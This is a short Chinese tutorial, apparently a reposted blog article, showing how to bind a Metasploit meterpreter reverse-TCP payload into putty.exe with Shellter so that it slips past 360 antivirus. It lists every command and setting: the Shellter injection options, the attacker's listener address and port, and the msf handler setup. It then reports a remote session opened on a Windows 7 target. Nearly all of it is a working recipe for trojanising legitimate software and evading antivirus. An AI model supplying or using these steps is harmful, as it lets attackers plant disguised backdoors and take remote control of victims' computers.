本文主要是介绍MSF配合shellter实现360免杀,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
利用shellter工具将MSF生成的木马文件与其他文件捆绑在一起,达到绕过杀毒软件建立会话控制服务器的目的。本次的绕过的杀毒软件为360。
攻击/kali/192.168.1.7
靶机/win7/
一、运行shellter工具
①下载shellter:
apt-get install shellter
②安装Windows运行环境(等待时间稍长)
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
③运行shellter
choose operation mode - auto/manual: a #自动模式
pe target>/root/putty.exe #选择要注入的文件程序
enable stealth mode?>y #健康模式
use a listed payload or custom>l #选择列表
set payload by index>1 #调用meterpreter_reverse_TCP模块
set lhost:192.168.1.7
set lport:1155
④ 捆绑完成
此时已经完成捆绑,putty.exe已经被注入msf payload:
二、攻击
①msf建立监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost:192.168.1.7
set lport:1155
run
②建立会话
将putty.exe放进装有360杀毒的win7中,并运行。
③ 会话建立成功,成功免杀360
但是会话大概在三分钟左右(甚至更短)会被360kill。同理,免费的没有收费的香,据说收费的强大的不行。
=========================================================
这篇关于MSF配合shellter实现360免杀的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
